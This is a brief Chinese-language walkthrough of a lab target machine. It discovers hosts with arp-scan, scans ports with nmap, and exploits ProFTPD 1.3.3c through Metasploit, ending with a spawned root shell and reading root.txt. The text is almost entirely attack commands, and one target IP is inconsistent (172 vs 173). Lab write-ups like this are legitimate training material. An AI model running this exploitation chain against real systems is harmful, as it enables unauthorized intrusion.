1.提供arp-scan工具扫描网络主机IP
arp-scan -l -i eh1
2.通过nmap 对目标主机进行扫描
nmap -A -p- -T5 172.30.1.134
-A : 启动Os检测,版本检测,脚本扫描和traceroute
-p- :全部端口
-T5 :快速扫描
3.通过扫描发现开启了ftp服务并且ftp的版本很低我们可用尝试通过这个服务进攻击
通过谷歌搜索引擎,搜索 ProFTPD 1.3.3c exploit
我们发现这个版本的ftp是有漏洞的而且在msf中有对应的漏洞利用模块
4.通过msf尝试利用漏洞
msfconsole -q
-q 不展示banner启动
search ProFTPD 1.3.3c
通常情况我们是通过服务的名称加版本配合search进行搜索
use 0
进入模块
show options
查看模块的参数配置
set rhosts 173.30.1.134
设置目标主机地址
set lhost 173.30.1.3
设置攻击主机地址
exploit
执行
但是我们发现执行后说们还没有设置payloa
show payloads
查看可用的payload列表
set payload 5
选择一个合适的payload进行设置
exploit
我们拿到了shell
python -c 'import pty;pty.spawn("/bin/bash")'
获取一个交互式shell
cat /root/root.txt
靶机通常在root目录下有个root.txt的文件看到它表示这个靶机已经拿下
完成